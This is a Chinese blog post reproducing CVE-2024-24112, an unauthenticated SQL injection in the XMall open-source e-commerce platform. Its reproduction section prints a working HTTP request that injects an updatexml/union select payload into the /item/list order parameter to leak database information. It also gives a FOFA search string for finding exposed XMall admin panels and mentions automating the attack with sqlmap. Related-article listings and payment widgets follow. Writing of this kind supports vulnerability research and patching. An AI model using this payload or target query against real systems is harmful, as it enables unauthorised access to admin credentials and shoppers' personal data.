XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

于 2024-02-21 21:28:06 发布
阅读量621 收藏 11
点赞数 8
文章标签: sql web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52514790/article/details/136219574
版权

XMall 开源商城 SQL注入漏洞复现(CVE-2024-24112)

一、产品简介

XMal 开源电商商城 是开发者Exrick的一款基于SOA架构Q的分布式电商购物商城 前后端分离 前台商城:Vue全家桶 后台管理:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。

在这里插入图片描述

二、漏洞概述

XMal 开源商城 itemlist./itemvistSearch,/svslog,lorderlist,/memmberlist、/meberlistremove等多处接口存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

三、影响范围

在这里插入图片描述

四、复现环境

fofa:app=“XMall-后台管理系统”

在这里插入图片描述

五、漏洞复现

POC


GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close

手动burp验证

可以看到已经爆出了数据库名字,当然可以利用sqlmap来实现

在这里插入图片描述
自动化验证

在这里插入图片描述

m0_52514790
关注
  • 8
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XMall分布式电商购物商城-其他
06-12
XMall是一个基于SOA架构的分布式电商购物商城,前后端分离。前台商城:Vue全家桶;后台管理系统:Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper等。 于SOA架构的分布式购物电商商城 后台管理系统:管理商品、订单、类目、商品规格属性、用户、权限、系统统计、系统日志以及前台内容等功能 前台系统:用户可以在前台系统中进行注册、登录、浏览商品、首页、下单等操作 会员系统:用户可以在该系统中查询已下的订单、管理订单、我的优惠券等信息 订单系统:提供下单、查询订单、修改订单状态、定时处理订单 搜索系统:提供商品的搜索功能 单点登录系统:为多个系统之间提供用户登录凭证以及查询登录用户的信息 XMall v1.1更新日志(需更新前后台代码及SQL) 接入自己开源的XPay个人免签收款支付系统 更新Dubbo(2.6.1)、ES(6.2.3)等依赖版本 消ES需在页面中配置及跨域问题,ES默认配置集群名改为原elasticsearch 修复后台统计热卖商品SQL错误,xmall-front-web模块支持SpringMVC文件上传配置 修改金额字段类型优化SQL与备注 优化后台页面 修复用户修改BUG 优化批量删除 优化商品分类添加 重构首页,后台可配置,包括3D轮播图 后台新增缓存管理功能菜单 完成订单打印发货等功能,实现快递管理 增添订单统计报表 修复前后端分离极验验证码session存储问题 实现ES IK分词插件扩展词典库管理 增添限流 2018.7.22 取消快速搜索接口需前端配置 发送邮件端口改为465 2018.7.27 首页导航栏可后台配置 2019.10.06 修复分类管理BUG 开源小程序前端 注:SKU设计预计将在小程序后台实现 极验验证码移除文档
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
CVE-2015-7857,又称为“Joomla SQL注入漏洞”,是由于Joomla在处理特定的用户输入时,没有进行足够的数据验证和过滤,导致恶意用户可能通过构造恶意请求来执行SQL命令。这个漏洞主要影响Joomla 3.2.0至3.2.3版本,...
xmall
RodJohnson_523391的专栏
06-28 650
[url]https://github.com/Exrick/xmall[/url]
Vue全家桶+Node.js全栈开发Xmall商城 - 1.4 Xmall商城导航组件实现
jolinoy的博客
04-08 980
项目相关的素材放在文章的低部,下载下来即可查看。 下面是项目目录: 目录 1.4 Xmall商城导航组件实现5步骤:1.4 Xmall商城导航组件实现第1步:在App.vue组件里面导入app组件样式,并设置style。 1.4 Xmall商城导航组件实现第2步:在router/index.js里面导入Goods组件和Thanks组件,并挂载。 1.4 Xmall商城导航组件实现第3步:在views文件夹下面分别新建两个文件夹Goods和Thanks,并分别新建组件,index.vue。 1.4
xmall商城学习笔记
qq_29798755的博客
09-08 1379
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录系列文章目录前言一、导入项目?二、使用步骤1.引入库2.读入数据总结 前言 作为一个菜逼混子程序员,c、c++、java、c#、android 都做过但是没有做的精的。这样的话一段时间学和没学一个样,最多有点印象。所有要学一个自己经常用的,并且作为自己主要方向。学了spring入门很久了
Vue+Node.js开发Xmall商城——Day1
量子前端的博客
04-01 820
今天是个美好的日子,因为今天又想到了一个新的项目——XMall商城。 特此记录项目开发全过程 商城官网传送门 http://xmall.exrick.cn/#/home 本项目目录基于Vue-cli脚手架搭建 vue create xmallshop 项目依赖选择了vueRouter、VueX,在搭建完成后安装了如下依赖包: "axios": "^0.21.1", "core-js": "^3.6.5", "element-ui": "^2.15.1", "less-l
Vue+Node.js开发Xmall商城——Day3
量子前端的博客
04-05 543
Xxmall商城项目迎来了第三天了,今天碰到的难题是登录注册方面的,将登陆成功的用户信息长久的保存在页面上,刷新后也不会重置。 如下是我实现登陆功能的整个思路,首先login登陆接口如下: // 模拟一个登陆的接口 app.post('/api/login', (req, res) => { console.log(req.body.user); // 登录成功获取用户名 let username = req.body.user //一系列的操作 res.jso
xmall-front:基于Vue开发的XMall商城前台页面PC端
02-06
XMall-Front 基于Vue开发的XMall商城前台页面 作者亲自制作 项目已部署,在线演示 前台商城: : 后台管理系统: : 感谢的开源项目提供前端页面及框架支持 初步全部重新开发接口,实现后台系统管理,嵌入接口项目请重定向至项目仓库查看 新增与优化 优化页脚,增加商品搜索框组件 优化登录注册界面 新增搜索页面,实现高亮分页搜索 新增捐赠页面,捐赠列表显示 全部商品页面实现分页 优化订单详情,实现查看订单进度,可对订单进行处理 实现生成订单接口,优化地址管理编辑选择 实现查看个人订单分页 接入 首页升级!改造首页,后台可配置,包括3D轮播图 新增分类查看品牌周边等 所用技术 V
基于Vue开发的XMall商城前台页面PC端
08-09
基于Vue开发的XMall商城前台页面 PC端
xmall:一套完整的社群电商系统,以及Api,后台管理系统,前台h5系统,小程序和App
02-04
购物中心 说明 基于SpringBoot + MyBatis的电商系统,包括前台商城系统和后台管理系统。 如果该项目对您有帮助,您可以点右上角“ Star”支持一下谢谢! 或者您可以“ follow”一下,该项目将持续更新,不断完善功能。 项目交流QQ群: 。 如有问题或好的建议可以在问题中提。 前言 mall项目致力于打造一个完整的电商系统,采用现阶段流行技术实现。 项目介绍 mall项目是一套电商系统,包括前台商城系统及后台管理系统,基于SpringBoot + MyBatis实现。前台商城系统包含首页门户,商品推荐,商品搜索,商品展示,购物车,订单流程,会员中心,客户服务,帮助中心等模
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
Vue+Node.js开发Xmall商城——Day2
量子前端的博客
04-03 524
昨天完成了首页组件的设计。 今天的工作量是第二个导航菜单——全部商品模块,如图: 其中有两个难点,困惑了我很久, 第一个是三种排序方法和价格过滤。 第二个难点就是每页的商品量是动态划分的。 这两个切换菜单基本设计很简单,就是Element-UI拷贝到本地的组件。首先从官方拿到了allGoods的接口,分析了一下,唉怪自己太不细心了,以为是无传参的URL,直接把全部29件商品拿到手在前端各种操作,升序排序都是Vue实例里完成了,后来才发现这URL不简单呀!!! http://localhost:8080/
xmall商城学习笔记 登录
qq_29798755的博客
09-09 1137
xmall商城学习笔记 文章目录xmall商城学习笔记前言一、单点登录是什么?二、项目结构总结 前言 提示:今天要看的xmall-sso,单点登录模块 一、单点登录是什么? 简单讲就是在一个系统(模块中登录)其他模块或系统都可以访问,无需在登录 这边有一篇文章讲的很透彻:单点登录的原理 我们这边主要来研究xmall是如何实现的,并且对它优化 二、项目结构 很明显这是一个服务,他是注册到zookeeper中的 我们主要看service ,它下面又三个文件比较重要 LoginServiceImpl、Mem
复现XMall 开源商城 SQL注入漏洞_54
最新发布
fushuang333的博客
02-20 579
复现XMall 开源商城 SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露
Vue全家桶+Node.js全栈开发Xmall商城
06-11
本项目是集vue2.6+vuex+vue- router+Element Ul+ES6+webpack+axios+Nodejs等技术栈打造的一款商城项目。内容包含:项目需求分析、首页组件和商品组件模块显示、用户模块显示、Token+JWT登录流程、购物车商品操作等功能。本项目以实战项目为切入点,模拟公司Vue项目研发流程,从头到尾讲解项目功能实现和优化、打包上线流程等,帮助提高你的技术层级,突破技术瓶颈。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值